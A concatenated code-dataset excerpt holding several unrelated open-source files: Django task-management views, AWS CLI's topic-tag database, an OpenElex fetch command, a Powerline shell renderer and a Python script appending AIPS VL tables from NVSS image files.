if request.POST['no_generate']: #They clicked 'prototype only,' so they don't want us to run .instantiate()
pass
except: #They didn't click "prototype only," thus they want the Task to be generated.
task = this_tp.instantiate(request.user) #Generate the task with the current user as the creator
#Now we'll deal with the access requirements.
privilege = Privilege.objects.get(id = request.POST['access_requirement'])
task_access_prototype = TaskAccessPrototype.objects.get_or_create(privilege = privilege, type=5)[0] #Hardcoded 5 - this ought to be an option in the form
task_access = TaskAccess.objects.create(prototype=task_access_prototype, task = task)
#I mean, seriously, shouldn't this be a post-save hook?
if task:
messages.success(request, 'You created <a href="%s">%s</a>.' % (task.get_absolute_url(), this_tp.name)) #TODO: Distinguish messages between creation of TaskPrototype and Task objects.
else:
messages.success(request, 'You created %s.' % this_tp.name) #TODO: Distinguish messages between creation of TaskPrototype and Task objects.
#We may have arrived here from the Task Profile form or some other place where at least one parent is certain. Let's find out.
try:
parent_ipso_facto_id = request.POST['parentIdIpsoFacto']
parent_task = Task.objects.get(id=parent_ipso_facto_id) #By jove, it's tru! Our new task already has a parent Task.
current_max_priority_ag = parent_task.children.all().aggregate(Max('priority'))
current_max_priority = current_max_priority_ag['priority__max']
try: #TODO: Boy, it's started to feel like we need a max_priority method, eh?
priority = int(current_max_priority) + 5 #Try setting the priority to the highest priority plus 5
except TypeError:
priority = 5 #Fuck it, there is no priority at all; we'll start it at 5
task_progeny = TaskProgeny.objects.create(parent=parent_task, child=task, priority = priority)
return HttpResponseRedirect(parent_task.get_absolute_url())
except MultiValueDictKeyError:
pass #Nope, guess not.
return HttpResponseRedirect('/do/create_task') #TODO: Dehydrate this using the reverse of the create task view.
@login_required
def new_child_ajax_handler(request):
form = TaskForm(request.POST)
if form.is_valid():
#First create the child task.
new_child_task = form.save()
#Now create the relationship to the parent.
try:
parent_id = request.POST['parent_id']
parent_task = Task.objects.get(id = parent_id)
siblings = parent_task.children.all() #Siblings of the task we just created
highest_order_rank = siblings.aggregate(Max('order_rank'))['order_rank__max']
if highest_order_rank:
new_order_rank = highest_order_rank + 1
else:
new_order_rank = 1
hierarchy = TaskProgeny.objects.create(child = new_child_task, parent = parent_task, order_rank = new_order_rank)
return HttpResponse(1)
except IndexError:
raise RuntimeError('The Parent ID got yanked from the form. Not cool.')
else:
#TODO: This is an exact repeat of the invalid handler in utility.views.submit_generic. DRY it up.
errors = []
for error in form.errors:
errors.append(error)
dumps = simplejson.dumps(errors)
return HttpResponse(dumps)
#TODO: Check that the user has proper authority
def task_family_as_checklist_template(request):
'''
Takes a Task or TaskPrototype and returns the children as a checklist template.
I don't love this function. It can be far more generic and helpful with a little tinkering. -Justin
'''
is_prototype = request.GET['is_prototype'] #Are we looking for a Task or a TaskPrototype?
id = request.GET['id']
try:
number_to_show = request.GET['limit'] #Maybe they specified a number of children to list....
except KeyError:
number_to_show = False #....maybe they didn't.
task_maybe_prototype_model = TaskPrototype if is_prototype else Task
task_maybe_prototype = task_maybe_prototype_model.objects.get(id=id)
model_name = task_maybe_prototype_model.__name__
progeny_objects = task_maybe_prototype.children.all()
if number_to_show:
progeny_objects = progeny_objects.limit(number_to_show)
return render(request, 'do/children_checklist.html', locals())
def task_prototype_list(request):
task_prototypes = TaskPrototype.objects.all()
return render(request, 'do/task_prototype_list.html', locals())
def get_people_for_verb_as_html(request, verb_id):
'''
Shows peoples' names in the public list page.
'''
verb = Verb.objects.get(id=verb_id)
people = verb.users_who_have_completed_tasks()
return render(request, 'do/people_list.html', locals() )
def get_tasks_as_html(request, object_id, by_verb=True, mix_progeny=False):
'''
Ajax specialized method that returns, in HTML, all the tasks to which a user has access within a specific verb or tag.
If verb is true, get by task. Otherwise, by tag.
Typical use case is a refresh signal sent by the push module or a click on the "three columns" page.
'''
if not by_verb:
tag = Tag.objects.get(id=object_id)
tagged_tasks = tag.taggit_taggeditem_items.filter(content_type = T) #TODO: Apply privileges
if not request.user.is_authenticated():
group_name = request.GET['group']
group = Group.objects.get(name=group_name)
privilege = get_object_or_404(Privilege, prototype__name="Anybody", jurisdiction=group)
access_objects = TaskAccess.objects.filter(prototype__privilege = privilege)
access_tasks = Task.objects.filter(access_requirements__in = access_objects, resolutions__isnull=True).distinct()
if by_verb:
verb = Verb.objects.get(id=object_id)
tasks = access_tasks.filter(prototype__type = verb)
else:
tasks_from_tag = tagged_tasks.filter(task__access_requirements__in = access_objects, resolutions__isnull=True).distinct()
tasks = set()
for task_from_tag in tasks_from_tag:
tasks.add(task_from_tag.content_object)
else: #They're logged in.
if by_verb:
verb = Verb.objects.get(id=object_id)
tasks = verb.get_tasks_for_user(request.user)
else:
tasks_from_tag = tagged_tasks #TODO: Again, privileges
tasks = set()
for task_from_tag in tasks_from_tag:
if task_from_tag.content_object.resolutions.count() == 0:
tasks.add(task_from_tag.content_object)
if not mix_progeny:
#Let's make sure that no child task is listed alongside its parent.
tasks_to_remove = set()
for task in tasks:
for progeny in task.parents.all():
if progeny.parent in tasks:
tasks_to_remove.add(task)
task_set = set(tasks) - tasks_to_remove
tasks = task_set
return render(request, 'do/task_list.html', locals())
#TODO: Security
def mark_completed(request, task_id):
task = Task.objects.get(id=task_id)
resolution = TaskResolution.objects.create(task=task, type="C", creator=request.user)
return HttpResponse(1)
def mark_abandoned(request):
return HttpResponse(1)
def update_task(request, task_id):
task = Task.objects.get(id=task_id)
task.update_to_prototype(user=request.user)
return redirect(task.get_absolute_url())
@login_required
def post_task_message(request, task_id):
'''
Take a message about a task. See if the task is complete and mark it so if so.
If the message field is not blank, send it to the social view to handle the text of the message.
'''
task = Task.objects.get(id=task_id)
try:
if request.POST['completed']:
task.set_status(2, request.user)
except MultiValueDictKeyError:
pass #They didn't mark it completed, no need to think about it further.
if request.POST['message']:
post_top_level_message(request, 'do__task__%s' % (task_id))
return HttpResponseRedirect(task.get_absolute_url())
def protocols(request):
'''
SlashRoot's policies, procedures, and protocols listed here.
Perhaps this will be eliminated once we get the organization of tasks under better control since most of these will be tasks.
'''
protocols = Protocol.objects.all()
return render(request,'do/protocols.html',{'protocols':protocols})
def archives(request):
#completed_tasks = TaskResolution.objects.filter(type='C').order_by('-created')
tasks = SERVICE_PROTOTYPE.instances.filter(status__gt=1).all()
return render(request, 'do/archives.html', locals()) | mit | 6,919,415,892,415,682,000 | 41.278689 | 212 | 0.630849 | false | 4.018352 | false | false | false |
mnahm5/django-estore | Lib/site-packages/awscli/topictags.py | 2 | 12651 | # Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import os
import json
import docutils.core
class TopicTagDB(object):
"""This class acts like a database for the tags of all available topics.
A tag is an element in a topic reStructured text file that contains
information about a topic. Information can range from titles to even
related CLI commands. Here are all of the currently supported tags:
Tag Meaning Required?
--- ------- ---------
:title: The title of the topic Yes
:description: Sentence description of topic Yes
:category: Category topic falls under Yes
:related topic: A related topic No
:related command: A related command No
To see examples of how to specify tags, look in the directory
awscli/topics. Note that tags can have multiple values by delimiting
values with commas. All tags must be on their own line in the file.
This class can load a JSON index represeting all topics and their tags,
scan all of the topics and store the values of their tags, retrieve the
tag value for a particular topic, query for all the topics with a specific
tag and/or value, and save the loaded data back out to a JSON index.
The structure of the database can be viewed as a python dictionary:
{'topic-name-1': {
'title': ['My First Topic Title'],
'description': ['This describes my first topic'],
'category': ['General Topics', 'S3'],
'related command': ['aws s3'],
'related topic': ['topic-name-2']
},
'topic-name-2': { .....
}
The keys of the dictionary are the CLI command names of the topics. These
names are based off the name of the reStructed text file that corresponds
to the topic. The value of these keys are dictionaries of tags, where the
tags are keys and their value is a list of values for that tag. Note
that all tag values for a specific tag of a specific topic are unique.
"""
VALID_TAGS = ['category', 'description', 'title', 'related topic',
'related command']
# The default directory to look for topics.
TOPIC_DIR = os.path.join(
os.path.dirname(
os.path.abspath(__file__)), 'topics')
# The default JSON index to load.
JSON_INDEX = os.path.join(TOPIC_DIR, 'topic-tags.json')
def __init__(self, tag_dictionary=None, index_file=JSON_INDEX,
topic_dir=TOPIC_DIR):
"""
:param index_file: The path to a specific JSON index to load.
If nothing is specified it will default to the default JSON
index at ``JSON_INDEX``.
:param topic_dir: The path to the directory where to retrieve
the topic source files. Note that if you store your index
in this directory, you must supply the full path to the json
index to the ``file_index`` argument as it may not be ignored when
listing topic source files. If nothing is specified it will
default to the default directory at ``TOPIC_DIR``.
"""
self._tag_dictionary = tag_dictionary
if self._tag_dictionary is None:
self._tag_dictionary = {}
self._index_file = index_file
self._topic_dir = topic_dir
@property
def index_file(self):
return self._index_file
@index_file.setter
def index_file(self, value):
self._index_file = value
@property
def topic_dir(self):
return self._topic_dir
@topic_dir.setter
def topic_dir(self, value):
self._topic_dir = value
@property
def valid_tags(self):
return self.VALID_TAGS
def load_json_index(self):
"""Loads a JSON file into the tag dictionary."""
with open(self.index_file, 'r') as f:
self._tag_dictionary = json.load(f)
def save_to_json_index(self):
"""Writes the loaded data back out to the JSON index."""
with open(self.index_file, 'w') as f:
f.write(json.dumps(self._tag_dictionary, indent=4, sort_keys=True))
def get_all_topic_names(self):
"""Retrieves all of the topic names of the loaded JSON index"""
return list(self._tag_dictionary)
def get_all_topic_src_files(self):
"""Retrieves the file paths of all the topics in directory"""
topic_full_paths = []
topic_names = os.listdir(self.topic_dir)
for topic_name in topic_names:
# Do not try to load hidden files.
if not topic_name.startswith('.'):
topic_full_path = os.path.join(self.topic_dir, topic_name)
# Ignore the JSON Index as it is stored with topic files.
if topic_full_path != self.index_file:
topic_full_paths.append(topic_full_path)
return topic_full_paths
def scan(self, topic_files):
"""Scan in the tags of a list of topics into memory.
Note that if there are existing values in an entry in the database
of tags, they will not be overwritten. Any new values will be
appended to original values.
:param topic_files: A list of paths to topics to scan into memory.
"""
for topic_file in topic_files:
with open(topic_file, 'r') as f:
# Parse out the name of the topic
topic_name = self._find_topic_name(topic_file)
# Add the topic to the dictionary if it does not exist
self._add_topic_name_to_dict(topic_name)
topic_content = f.read()
# Record the tags and the values
self._add_tag_and_values_from_content(
topic_name, topic_content)
def _find_topic_name(self, topic_src_file):
# Get the name of each of these files
topic_name_with_ext = os.path.basename(topic_src_file)
# Strip of the .rst extension from the files
return topic_name_with_ext[:-4]
def _add_tag_and_values_from_content(self, topic_name, content):
# Retrieves tags and values and adds from content of topic file
# to the dictionary.
doctree = docutils.core.publish_doctree(content).asdom()
fields = doctree.getElementsByTagName('field')
for field in fields:
field_name = field.getElementsByTagName('field_name')[0]
field_body = field.getElementsByTagName('field_body')[0]
# Get the tag.
tag = field_name.firstChild.nodeValue
if tag in self.VALID_TAGS:
# Get the value of the tag.
values = field_body.childNodes[0].firstChild.nodeValue
# Seperate values into a list by splitting at commas
tag_values = values.split(',')
# Strip the white space around each of these values.
for i in range(len(tag_values)):
tag_values[i] = tag_values[i].strip()
self._add_tag_to_dict(topic_name, tag, tag_values)
else:
raise ValueError(
"Tag %s found under topic %s is not supported."
% (tag, topic_name)
)
def _add_topic_name_to_dict(self, topic_name):
# This method adds a topic name to the dictionary if it does not
# already exist
# Check if the topic is in the topic tag dictionary
if self._tag_dictionary.get(topic_name, None) is None:
self._tag_dictionary[topic_name] = {}
def _add_tag_to_dict(self, topic_name, tag, values):
# This method adds a tag to the dictionary given its tag and value
# If there are existing values associated to the tag it will add
# only values that previously did not exist in the list.
# Add topic to the topic tag dictionary if needed.
self._add_topic_name_to_dict(topic_name)
# Get all of a topics tags
topic_tags = self._tag_dictionary[topic_name]
self._add_key_values(topic_tags, tag, values)
def _add_key_values(self, dictionary, key, values):
# This method adds a value to a dictionary given a key.
# If there are existing values associated to the key it will add
# only values that previously did not exist in the list. All values
# in the dictionary should be lists
if dictionary.get(key, None) is None:
dictionary[key] = []
for value in values:
if value not in dictionary[key]:
dictionary[key].append(value)
def query(self, tag, values=None):
"""Groups topics by a specific tag and/or tag value.
:param tag: The name of the tag to query for.
:param values: A list of tag values to only include in query.
If no value is provided, all possible tag values will be returned
:rtype: dictionary
:returns: A dictionary whose keys are all possible tag values and the
keys' values are all of the topic names that had that tag value
in its source file. For example, if ``topic-name-1`` had the tag
``:category: foo, bar`` and ``topic-name-2`` had the tag
``:category: foo`` and we queried based on ``:category:``,
the returned dictionary would be:
{
'foo': ['topic-name-1', 'topic-name-2'],
'bar': ['topic-name-1']
}
"""
query_dict = {}
for topic_name in self._tag_dictionary.keys():
# Get the tag values for a specified tag of the topic
if self._tag_dictionary[topic_name].get(tag, None) is not None:
tag_values = self._tag_dictionary[topic_name][tag]
for tag_value in tag_values:
# Add the values to dictionary to be returned if
# no value constraints are provided or if the tag value
# falls in the allowed tag values.
if values is None or tag_value in values:
self._add_key_values(query_dict,
key=tag_value,
values=[topic_name])
return query_dict
def get_tag_value(self, topic_name, tag, default_value=None):
"""Get a value of a tag for a topic
:param topic_name: The name of the topic
:param tag: The name of the tag to retrieve
:param default_value: The value to return if the topic and/or tag
does not exist.
"""
if topic_name in self._tag_dictionary:
return self._tag_dictionary[topic_name].get(tag, default_value)
return default_value
def get_tag_single_value(self, topic_name, tag):
"""Get the value of a tag for a topic (i.e. not wrapped in a list)
:param topic_name: The name of the topic
:param tag: The name of the tag to retrieve
:raises VauleError: Raised if there is not exactly one value
in the list value.
"""
value = self.get_tag_value(topic_name, tag)
if value is not None:
if len(value) != 1:
raise ValueError(
'Tag %s for topic %s has value %. Expected a single '
'element in list.' % (tag, topic_name, value)
)
value = value[0]
return value
| mit | -4,637,528,009,400,645,000 | 41.884746 | 79 | 0.606592 | false | 4.320697 | false | false | false |
openelections/openelections-core | openelex/tasks/fetch.py | 2 | 1291 | import sys
import click
from openelex.base.fetch import BaseFetcher
from .utils import default_state_options, load_module
@click.command(help="Scrape data files and store in local file cache "
"under standardized name")
@default_state_options
@click.option('--unprocessed', is_flag=True,
help="Fetch unprocessed data files only")
def fetch(state, datefilter='', unprocessed=False):
"""
Scrape data files and store in local file cache
under standardized name.
State is required. Optionally provide 'datefilter'
to limit files that are fetched.
"""
state_mod = load_module(state, ['datasource', 'fetch'])
datasrc = state_mod.datasource.Datasource()
if hasattr(state_mod, 'fetch'):
fetcher = state_mod.fetch.FetchResults()
else:
fetcher = BaseFetcher(state)
if unprocessed:
try:
filename_url_pairs = datasrc.unprocessed_filename_url_pairs(datefilter)
except NotImplementedError:
sys.exit("No unprocessed data files are available. Try running this "
"task without the --unprocessed option.")
else:
filename_url_pairs = datasrc.filename_url_pairs(datefilter)
for std_filename, url in filename_url_pairs:
fetcher.fetch(url, std_filename)
| mit | -5,731,460,157,850,020,000 | 32.973684 | 83 | 0.684741 | false | 3.984568 | false | false | false |
DaneelOliwan/dotfiles-vim | .vim/bundle/powerline/powerline/renderers/shell.py | 1 | 1842 | # vim:fileencoding=utf-8:noet
from powerline.renderer import Renderer
from powerline.colorscheme import ATTR_BOLD, ATTR_ITALIC, ATTR_UNDERLINE
def int_to_rgb(num):
r = (num >> 16) & 0xff
g = (num >> 8) & 0xff
b = num & 0xff
return r, g, b
class ShellRenderer(Renderer):
'''Powerline shell segment renderer.'''
escape_hl_start = ''
escape_hl_end = ''
term_truecolor = False
tmux_escape = False
screen_escape = False
def hlstyle(self, fg=None, bg=None, attr=None):
'''Highlight a segment.
If an argument is None, the argument is ignored. If an argument is
False, the argument is reset to the terminal defaults. If an argument
is a valid color or attribute, it's added to the ANSI escape code.
'''
ansi = [0]
if fg is not None:
if fg is False or fg[0] is False:
ansi += [39]
else:
if self.term_truecolor:
ansi += [38, 2] + list(int_to_rgb(fg[1]))
else:
ansi += [38, 5, fg[0]]
if bg is not None:
if bg is False or bg[0] is False:
ansi += [49]
else:
if self.term_truecolor:
ansi += [48, 2] + list(int_to_rgb(bg[1]))
else:
ansi += [48, 5, bg[0]]
if attr is not None:
if attr is False:
ansi += [22]
else:
if attr & ATTR_BOLD:
ansi += [1]
elif attr & ATTR_ITALIC:
# Note: is likely not to work or even be inverse in place of
# italic. Omit using this in colorschemes.
ansi += [3]
elif attr & ATTR_UNDERLINE:
ansi += [4]
r = '\033[{0}m'.format(';'.join(str(attr) for attr in ansi))
if self.tmux_escape:
r = '\033Ptmux;' + r.replace('\033', '\033\033') + '\033\\'
elif self.screen_escape:
r = '\033P' + r.replace('\033', '\033\033') + '\033\\'
return self.escape_hl_start + r + self.escape_hl_end
@staticmethod
def escape(string):
return string.replace('\\', '\\\\')
renderer = ShellRenderer
| gpl-2.0 | -9,140,306,692,351,152,000 | 25.314286 | 72 | 0.614007 | false | 2.782477 | false | false | false |
kernsuite-debian/obit | python/scriptCopyVLTab.py | 2 | 18118 | # Python script to copy AIPS VL tables
import Table, Image, OErr, OSystem
# Init Obit
err=OErr.OErr()
ObitSys=OSystem.OSystem ("CopyVLTables", 1, 103, 1, ["None"],
2, ["../FITSdata/","/mnt/cdrom/MAPS/"], 1, 0, err)
OErr.printErrMsg(err, "Error with Obit startup")
outfile = "Catalog.fits"
outdisk = 1
indisk = 2
def AppendVLTable (infile, outfile=outfile, err=err):
""" Copy VL table ver 1 from infile to outfile
infile = name of input FITS image file with VL table
outfile = name of output FITS image file with extant VL table
err = Python Obit Error/message stack
"""
################################################################
# Get images
inImage = Image.newPImage("Input image", infile, indisk, 1, err)
outImage = Image.newPImage("Output image", outfile, outdisk, 1, err)
OErr.printErrMsg(err, "Error creating image objects")
#
# obtain "AIPS VL" tables from each
inTable = Image.PImageNewImageTable(inImage, 1, "AIPS VL", 1, err)
outTable = Image.PImageNewImageTable(outImage, 3, "AIPS VL", 1, err)
OErr.printErrMsg(err, "Error extracting AIPS VL table objects")
# Concatenate
Table.PConcat (inTable, outTable, err)
OErr.printErrMsg(err, "Error concatenatinfg tables")
print "Appended",infile,"to",outfile
# end AppendVLTable
# CD 4 of NVSS
AppendVLTable ("I1808M04.gz")
AppendVLTable ("I1808M08.gz")
AppendVLTable ("I1808M12.gz")
AppendVLTable ("I1808M16.gz")
#no table AppendVLTable ("I1808M20.gz")
AppendVLTable ("I1808M24.gz")
AppendVLTable ("I1808M28.gz")
AppendVLTable ("I1808P00.gz")
AppendVLTable ("I1808P04.gz")
AppendVLTable ("I1808P08.gz")
AppendVLTable ("I1808P12.gz")
AppendVLTable ("I1808P16.gz")
AppendVLTable ("I1808P20.gz")
AppendVLTable ("I1808P24.gz")
AppendVLTable ("I1808P28.gz")
AppendVLTable ("I1818M32.gz")
AppendVLTable ("I1818M36.gz")
AppendVLTable ("I1818P32.gz")
AppendVLTable ("I1818P36.gz")
AppendVLTable ("I1820M40.gz")
AppendVLTable ("I1820P40.gz")
AppendVLTable ("I1820P44.gz")
AppendVLTable ("I1820P48.gz")
AppendVLTable ("I1824M04.gz")
AppendVLTable ("I1824M08.gz")
AppendVLTable ("I1824M12.gz")
AppendVLTable ("I1824M16.gz")
AppendVLTable ("I1824M20.gz")
AppendVLTable ("I1824M24.gz")
AppendVLTable ("I1824M28.gz")
AppendVLTable ("I1824P00.gz")
AppendVLTable ("I1824P04.gz")
AppendVLTable ("I1824P08.gz")
AppendVLTable ("I1824P12.gz")
AppendVLTable ("I1824P16.gz")
AppendVLTable ("I1824P20.gz")
AppendVLTable ("I1824P24.gz")
AppendVLTable ("I1824P28.gz")
AppendVLTable ("I1824P52.gz")
AppendVLTable ("I1824P56.gz")
AppendVLTable ("I1830P60.gz")
AppendVLTable ("I1830P64.gz")
AppendVLTable ("I1836M32.gz")
AppendVLTable ("I1836M36.gz")
AppendVLTable ("I1836P32.gz")
AppendVLTable ("I1836P36.gz")
AppendVLTable ("I1836P68.gz")
AppendVLTable ("I1840M04.gz")
AppendVLTable ("I1840M08.gz")
AppendVLTable ("I1840M12.gz")
AppendVLTable ("I1840M16.gz")
AppendVLTable ("I1840M20.gz")
AppendVLTable ("I1840M24.gz")
AppendVLTable ("I1840M28.gz")
AppendVLTable ("I1840M40.gz")
AppendVLTable ("I1840P00.gz")
AppendVLTable ("I1840P04.gz")
AppendVLTable ("I1840P08.gz")
AppendVLTable ("I1840P12.gz")
AppendVLTable ("I1840P16.gz")
AppendVLTable ("I1840P20.gz")
AppendVLTable ("I1840P24.gz")
AppendVLTable ("I1840P28.gz")
AppendVLTable ("I1840P40.gz")
AppendVLTable ("I1840P44.gz")
AppendVLTable ("I1840P48.gz")
AppendVLTable ("I1845P72.gz")
AppendVLTable ("I1845P76.gz")
AppendVLTable ("I1848P52.gz")
AppendVLTable ("I1848P56.gz")
AppendVLTable ("I1854M32.gz")
AppendVLTable ("I1854M36.gz")
AppendVLTable ("I1854P32.gz")
AppendVLTable ("I1854P36.gz")
AppendVLTable ("I1856M04.gz")
AppendVLTable ("I1856M08.gz")
AppendVLTable ("I1856M12.gz")
AppendVLTable ("I1856M16.gz")
AppendVLTable ("I1856M20.gz")
AppendVLTable ("I1856M24.gz")
AppendVLTable ("I1856M28.gz")
AppendVLTable ("I1856P00.gz")
AppendVLTable ("I1856P04.gz")
AppendVLTable ("I1856P08.gz")
AppendVLTable ("I1856P12.gz")
AppendVLTable ("I1856P16.gz")
AppendVLTable ("I1856P20.gz")
AppendVLTable ("I1856P24.gz")
AppendVLTable ("I1856P28.gz")
AppendVLTable ("I1900M40.gz")
AppendVLTable ("I1900P40.gz")
AppendVLTable ("I1900P44.gz")
AppendVLTable ("I1900P48.gz")
AppendVLTable ("I1900P60.gz")
AppendVLTable ("I1900P64.gz")
AppendVLTable ("I1900P80.gz")
AppendVLTable ("I1912M04.gz")
AppendVLTable ("I1912M08.gz")
AppendVLTable ("I1912M12.gz")
AppendVLTable ("I1912M16.gz")
AppendVLTable ("I1912M20.gz")
AppendVLTable ("I1912M24.gz")
AppendVLTable ("I1912M28.gz")
AppendVLTable ("I1912M32.gz")
AppendVLTable ("I1912M36.gz")
AppendVLTable ("I1912P00.gz")
AppendVLTable ("I1912P04.gz")
AppendVLTable ("I1912P08.gz")
AppendVLTable ("I1912P12.gz")
AppendVLTable ("I1912P16.gz")
AppendVLTable ("I1912P20.gz")
AppendVLTable ("I1912P24.gz")
AppendVLTable ("I1912P28.gz")
AppendVLTable ("I1912P32.gz")
AppendVLTable ("I1912P36.gz")
AppendVLTable ("I1912P52.gz")
AppendVLTable ("I1912P56.gz")
AppendVLTable ("I1912P68.gz")
AppendVLTable ("I1920M40.gz")
AppendVLTable ("I1920P40.gz")
AppendVLTable ("I1920P44.gz")
AppendVLTable ("I1920P48.gz")
AppendVLTable ("I1928M04.gz")
AppendVLTable ("I1928M08.gz")
AppendVLTable ("I1928M12.gz")
AppendVLTable ("I1928M16.gz")
AppendVLTable ("I1928M20.gz")
AppendVLTable ("I1928M24.gz")
AppendVLTable ("I1928M28.gz")
AppendVLTable ("I1928P00.gz")
AppendVLTable ("I1928P04.gz")
AppendVLTable ("I1928P08.gz")
AppendVLTable ("I1928P12.gz")
AppendVLTable ("I1928P16.gz")
AppendVLTable ("I1928P20.gz")
AppendVLTable ("I1928P24.gz")
AppendVLTable ("I1928P28.gz")
AppendVLTable ("I1930M32.gz")
AppendVLTable ("I1930M36.gz")
AppendVLTable ("I1930P32.gz")
AppendVLTable ("I1930P36.gz")
AppendVLTable ("I1930P60.gz")
AppendVLTable ("I1930P64.gz")
AppendVLTable ("I1930P72.gz")
AppendVLTable ("I1930P76.gz")
AppendVLTable ("I1930P84.gz")
AppendVLTable ("I1936P52.gz")
AppendVLTable ("I1936P56.gz")
AppendVLTable ("I1940M40.gz")
AppendVLTable ("I1940P40.gz")
AppendVLTable ("I1940P44.gz")
AppendVLTable ("I1940P48.gz")
AppendVLTable ("I1944M04.gz")
AppendVLTable ("I1944M08.gz")
AppendVLTable ("I1944M12.gz")
AppendVLTable ("I1944M16.gz")
AppendVLTable ("I1944M20.gz")
AppendVLTable ("I1944M24.gz")
AppendVLTable ("I1944M28.gz")
AppendVLTable ("I1944P00.gz")
AppendVLTable ("I1944P04.gz")
AppendVLTable ("I1944P08.gz")
AppendVLTable ("I1944P12.gz")
AppendVLTable ("I1944P16.gz")
AppendVLTable ("I1944P20.gz")
AppendVLTable ("I1944P24.gz")
AppendVLTable ("I1944P28.gz")
AppendVLTable ("I1948M32.gz")
AppendVLTable ("I1948M36.gz")
AppendVLTable ("I1948P32.gz")
AppendVLTable ("I1948P36.gz")
AppendVLTable ("I1948P68.gz")
AppendVLTable ("I2000M04.gz")
AppendVLTable ("I2000M08.gz")
AppendVLTable ("I2000M12.gz")
AppendVLTable ("I2000M16.gz")
AppendVLTable ("I2000M20.gz")
AppendVLTable ("I2000M24.gz")
AppendVLTable ("I2000M28.gz")
AppendVLTable ("I2000M40.gz")
AppendVLTable ("I2000P00.gz")
AppendVLTable ("I2000P04.gz")
AppendVLTable ("I2000P08.gz")
AppendVLTable ("I2000P12.gz")
AppendVLTable ("I2000P16.gz")
AppendVLTable ("I2000P20.gz")
AppendVLTable ("I2000P24.gz")
AppendVLTable ("I2000P28.gz")
AppendVLTable ("I2000P40.gz")
AppendVLTable ("I2000P44.gz")
AppendVLTable ("I2000P48.gz")
AppendVLTable ("I2000P52.gz")
AppendVLTable ("I2000P56.gz")
AppendVLTable ("I2000P60.gz")
AppendVLTable ("I2000P64.gz")
AppendVLTable ("I2000P80.gz")
AppendVLTable ("I2006M32.gz")
AppendVLTable ("I2006M36.gz")
AppendVLTable ("I2006P32.gz")
AppendVLTable ("I2006P36.gz")
AppendVLTable ("I2015P72.gz")
AppendVLTable ("I2015P76.gz")
AppendVLTable ("I2016M04.gz")
AppendVLTable ("I2016M08.gz")
AppendVLTable ("I2016M12.gz")
AppendVLTable ("I2016M16.gz")
AppendVLTable ("I2016M20.gz")
AppendVLTable ("I2016M24.gz")
AppendVLTable ("I2016M28.gz")
AppendVLTable ("I2016P00.gz")
AppendVLTable ("I2016P04.gz")
AppendVLTable ("I2016P08.gz")
AppendVLTable ("I2016P12.gz")
AppendVLTable ("I2016P16.gz")
AppendVLTable ("I2016P20.gz")
AppendVLTable ("I2016P24.gz")
AppendVLTable ("I2016P28.gz")
AppendVLTable ("I2020M40.gz")
AppendVLTable ("I2020P40.gz")
AppendVLTable ("I2020P44.gz")
AppendVLTable ("I2020P48.gz")
AppendVLTable ("I2024M32.gz")
AppendVLTable ("I2024M36.gz")
AppendVLTable ("I2024P32.gz")
AppendVLTable ("I2024P36.gz")
AppendVLTable ("I2024P52.gz")
AppendVLTable ("I2024P56.gz")
AppendVLTable ("I2024P68.gz")
AppendVLTable ("I2030P60.gz")
AppendVLTable ("I2030P64.gz")
AppendVLTable ("I2032M04.gz")
AppendVLTable ("I2032M08.gz")
AppendVLTable ("I2032M12.gz")
AppendVLTable ("I2032M16.gz")
AppendVLTable ("I2032M20.gz")
AppendVLTable ("I2032M24.gz")
AppendVLTable ("I2032M28.gz")
AppendVLTable ("I2032P00.gz")
AppendVLTable ("I2032P04.gz")
AppendVLTable ("I2032P08.gz")
AppendVLTable ("I2032P12.gz")
AppendVLTable ("I2032P16.gz")
AppendVLTable ("I2032P20.gz")
AppendVLTable ("I2032P24.gz")
AppendVLTable ("I2032P28.gz")
AppendVLTable ("I2040M40.gz")
AppendVLTable ("I2040P40.gz")
AppendVLTable ("I2040P44.gz")
AppendVLTable ("I2040P48.gz")
AppendVLTable ("I2042M32.gz")
AppendVLTable ("I2042M36.gz")
AppendVLTable ("I2042P32.gz")
AppendVLTable ("I2042P36.gz")
AppendVLTable ("I2048M04.gz")
AppendVLTable ("I2048M08.gz")
AppendVLTable ("I2048M12.gz")
AppendVLTable ("I2048M16.gz")
AppendVLTable ("I2048M20.gz")
AppendVLTable ("I2048M24.gz")
AppendVLTable ("I2048M28.gz")
AppendVLTable ("I2048P00.gz")
AppendVLTable ("I2048P04.gz")
AppendVLTable ("I2048P08.gz")
AppendVLTable ("I2048P12.gz")
AppendVLTable ("I2048P16.gz")
AppendVLTable ("I2048P20.gz")
AppendVLTable ("I2048P24.gz")
AppendVLTable ("I2048P28.gz")
AppendVLTable ("I2048P52.gz")
AppendVLTable ("I2048P56.gz")
AppendVLTable ("I2100M32.gz")
AppendVLTable ("I2100M36.gz")
AppendVLTable ("I2100M40.gz")
AppendVLTable ("I2100P32.gz")
AppendVLTable ("I2100P36.gz")
AppendVLTable ("I2100P40.gz")
AppendVLTable ("I2100P44.gz")
AppendVLTable ("I2100P48.gz")
AppendVLTable ("I2100P60.gz")
AppendVLTable ("I2100P64.gz")
AppendVLTable ("I2100P68.gz")
AppendVLTable ("I2100P72.gz")
AppendVLTable ("I2100P76.gz")
AppendVLTable ("I2100P80.gz")
AppendVLTable ("I2100P84.gz")
AppendVLTable ("I2100P88.gz")
AppendVLTable ("I2104M04.gz")
AppendVLTable ("I2104M08.gz")
AppendVLTable ("I2104M12.gz")
AppendVLTable ("I2104M16.gz")
AppendVLTable ("I2104M20.gz")
AppendVLTable ("I2104M24.gz")
AppendVLTable ("I2104M28.gz")
AppendVLTable ("I2104P00.gz")
